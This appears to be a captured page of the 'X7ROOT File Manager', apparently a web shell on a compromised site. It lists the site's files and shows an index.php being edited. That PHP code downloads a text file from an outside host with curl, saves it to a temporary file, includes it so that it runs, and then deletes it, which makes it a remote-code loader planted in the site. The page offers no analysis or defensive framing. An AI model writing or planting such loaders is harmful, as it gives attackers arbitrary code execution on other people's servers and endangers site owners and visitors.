X7ROOT File Manager
Current Path:
/home/okeydcqc/test2.okeyanueyiagu.com/818629
home
/
okeydcqc
/
test2.okeyanueyiagu.com
/
818629
/
ðŸ“
..
📄
1.txt
(39 B)
📄
about.php
(13.03 KB)
📄
index.php
(578 B)
📄
radio.php
(5.22 KB)
Editing: index.php
<?php $url = "https://51la.zvo2.xyz/a2.txt"; // Ganti dengan URL yang diinginkan $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); if ($result === false) { echo "Error: " . "PD9waHA=" . curl_error($ch); } else { // Simpan hasil dari URL ke dalam file lokal $tempFile = tempnam(sys_get_temp_dir(), 'pasted_code_'); file_put_contents($tempFile, $result); // Include file yang telah diunduh dari URL include $tempFile; // Hapus file sementara setelah dieksekusi unlink($tempFile); } curl_close($ch);
Upload File
Create Folder